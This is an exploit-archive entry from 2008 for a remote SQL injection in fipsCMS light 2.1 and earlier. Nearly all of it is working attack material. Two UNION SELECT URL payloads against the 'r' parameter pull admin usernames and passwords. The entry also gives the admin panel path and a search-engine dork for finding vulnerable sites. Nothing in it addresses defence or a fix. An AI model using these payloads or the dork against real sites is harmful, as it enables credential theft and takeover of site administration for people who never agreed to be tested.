fipsCMS light <= 2.1 (r) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : fipsCMS light <= 2.1 (r) Remote SQL Injection Vulnerability
# Published : 2008-07-26
# Author : U238
# Previous Title : SiteAdmin CMS (art) Remote SQL Injection Vulnerability
# Next Title : phpWebNews 0.2 MySQL Edition (SQL) Insecure Cookie Handling Vuln

Exploit Code:

victim/path/home/index.asp?w=pages&r=9999999 union select all 0,username,null,0x1 from admin

victim/path/home/index.asp?w=pages&r=9999999 union select all 0,password,null,0x1 from admin

http://localhost:2222/lab/cms/_admin

Download:http://login.fipsasp.com/File.asp?ID=60&CatID=5
Found By U238
# Exploit Search Find: ^o)
#
# fipsCMS light - ???? fipsASP 2003 - 2008. All rights reserved
#
# fipsCMS light - ???? fipsASP 2003 - 2008
#
# inurl:"fipsASP 2003 - 2008"
# ************************************************ 

# www.Syue.com [2008-07-26]